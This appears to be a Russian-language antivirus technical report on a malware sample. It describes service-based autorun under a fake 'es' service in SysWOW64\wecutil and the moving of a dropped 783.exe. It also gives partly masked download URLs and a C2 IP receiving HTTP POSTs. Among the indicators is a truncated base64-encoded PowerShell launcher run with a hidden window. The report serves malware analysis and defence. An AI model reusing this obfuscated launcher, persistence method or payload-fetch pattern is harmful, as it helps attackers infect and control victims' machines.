Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\es] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\es] 'ImagePath' = '"%WINDIR%\SysWOW64\wecutil\es.exe"'
Создает следующие сервисы
- 'es' "%WINDIR%\SysWOW64\wecutil\es.exe"
- 'es' %WINDIR%\SysWOW64\wecutil\es.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAG8AbwBjAGgAZwBlAGEAagB3AGkAagA9ACcAcwBvAGkAbgBjAGgAYQB2AGsAaQBvAHEAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAGAAVQBSAGkAVABZAHAAcgBPAH...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\783.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\wecutil\es.exe
Перемещает следующие файлы
- %HOMEPATH%\783.exe в %WINDIR%\syswow64\wecutil\es.exe
Сетевая активность
Подключается к
- '14#.#39.91.187':443
TCP
Запросы HTTP GET
- http://he##eli.com/CtWE205/
- http://he###xcomic.com/cgi-bin/LogU/
- http://sh#####dfellowship.org/wp-content/jl21/
- http://co###a.online/sys-cache/bHYl6515/
- http://fr#####slavictoria.com/dbi/8Y2492/kCXg637791/
Запросы HTTP POST
- http://14#.##9.91.187:443/bCMFnw/afldN02w/DqyGuKpyMT5x/9LO1xgjQLUH/Y2TJJKlYwCOoKfFxZW/ via 14#.#39.91.187
UDP
- DNS ASK he##eli.com
- DNS ASK he###xcomic.com
- DNS ASK sh#####dfellowship.org
- DNS ASK co###a.online
- DNS ASK fr#####slavictoria.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\783.exe'
- '%WINDIR%\syswow64\wecutil\es.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAG8AbwBjAGgAZwBlAGEAagB3AGkAagA9ACcAcwBvAGkAbgBjAGgAYQB2AGsAaQBvAHEAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAGAAVQBSAGkAVABZAHAAcgBPAH...' (со скрытым окном)
